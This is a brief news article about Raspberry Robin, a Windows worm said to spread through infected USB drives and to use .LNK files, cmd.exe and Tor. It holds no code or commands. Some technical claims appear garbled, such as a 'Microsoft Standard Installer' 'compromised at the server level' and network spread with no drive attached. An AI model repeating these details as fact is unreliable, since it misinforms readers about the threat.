A new malware called Raspberry Robin is spreading through USB drives

Security researchers discovered a new Windows virus, which is distributed on USB-drives. 

The malware was named Raspberry Robin and has been spreading since September 2021. Cybersecurity experts from Red Canary have discovered this virus on the corporate networks of their clients in the technology sector.

The main distribution method for Raspberry Robin is an infected USB flash drive. When it connects to a Windows computer, the virus activates a malicious file with the .LNK extension – it launches its process on the system using cmd.exe. It is noted that the virus uses the regular Microsoft Standard Installer system to access the control servers – experts believe that this system is also compromised at the server level and uses Tor communication nodes.


Simply put, Raspberry Robin gets onto a computer using a USB drive, after which it distributes its copies over network access using standard Windows server services. In fact, you yourself do not need to connect any infected flash drives to your PC – it is enough for any user in the server network where you are located, and your computer will be infected.

The most curious thing in this chain is that Raspberry Robin has not yet shown its goals. At the moment, it only spreads and settles on newer and newer PCs and laptops, but does nothing. Experts don’t know what the creators of Raspberry Robin have in mind. And they still don’t know where and how USB flash drives are infected – theoretically, any medium can be (or become) dangerous, even the one that is in your pocket.

Leave a Comment